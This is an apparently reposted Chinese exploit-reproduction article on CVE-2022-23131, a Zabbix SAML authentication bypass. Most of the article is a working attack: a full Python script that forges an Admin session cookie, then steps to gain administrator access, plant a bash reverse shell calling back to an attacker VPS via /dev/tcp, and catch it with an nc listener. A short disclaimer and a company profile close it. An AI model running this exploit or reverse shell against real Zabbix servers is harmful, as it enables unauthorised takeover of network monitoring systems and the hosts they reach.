0x01 漏洞描述
Zabbix是一个非常流行的开源监控平台,用于收集、集中和跟踪整个基础设施中的CPU负载和网络流量等指标。它与PandoraFMS和Nagios等解决方案非常相似。由于其受欢迎程度、功能和在大多数公司网络中的特权地位,Zabbix是威胁参与者的高调目标。Zabbix对客户端提交的Cookie会话存在不安全的存储方式,导致在启动SAMLSSO认证模式的前提下,恶意用户可通过构造特殊请求绕过认证,获取管理员权限,进而可实现RCE。
0x02 漏洞复现
漏洞影响: zabbix 4.0.36 5.0.18 5.4.8 6.0.0alpha1
1.python攻击脚本获取加密后的cookie
1.python脚本# codingimport sysimport requestsimport re,base64,urllib.parse,json# 禁用警告from requests.packages.urllib3.exceptions import InsecureRequestWarningrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)def runPoc(url):response = requests.get(url,verify=False)cookie = response.headers.get("Set-Cookie")sessionReg = re.compile("zbx_session=(.*?);")try:session = re.findall(sessionReg,cookie)[0]base64_decode = base64.b64decode(urllib.parse.unquote(session,encoding="utf-8"))session_json = json.loads(base64_decode)payload = '{"saml_data":{"username_attribute":"Admin"},"sessionid":"%s","sign":"%s"}'%(session_json["sessionid"],session_json["sign"])print("未加密Payload:" + payload)print('n')payload_encode = urllib.parse.quote(base64.b64encode(payload.encode()))print("加密后Payload:" + payload_encode)except IndexError:print("[-] 不存在漏洞")if __name__ == '__main__':try:url = sys.argv[1]runPoc(url)except IndexError:print("""Use: python CVE-2022-23131.py http://xxxxxxxxx.comBy:MrHatSec""")2.执行python CVE-2022-23131.py http://zabbixserver
2.替换加密后的cookie,并使用SAML方式登录
3.登录成功,Administration→Scripts→Create Script编写反弹shell脚本,并使用VPS nc监听
bash -c 'exec bash -i &>/dev/tcp/x.x.x.x/7777 <&1'
4.Monitoring→Latest data→点击Zabbix server运行脚本,vps获得shell
nc -lvvp 7777
(注:本文章为技术分享,禁止任何非授权攻击行为)
0x03 公司简介
江西渝融云安全科技有限公司,2017年发展至今,已成为了一家集云安全、物联网安全、数据安全、等保建设、风险评估、信息技术应用创新及网络安全人才培训为一体的本地化高科技公司,是江西省信息安全产业链企业和江西省政府部门重点行业网络安全事件应急响应队伍成员。
公司现已获得信息安全集成三级、信息系统安全运维三级、风险评估三级等多项资质认证,拥有软件著作权十八项;荣获2020年全国工控安全深度行安全攻防对抗赛三等奖;庆祝建党100周年活动信息安全应急保障优秀案例等荣誉......
编制:sm
审核:fjh
审核:Dog
原文始发于微信公众号(融云攻防实验室):漏洞复现 CVE-2022-23131 zabbix SAML未授权访问 getshell
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论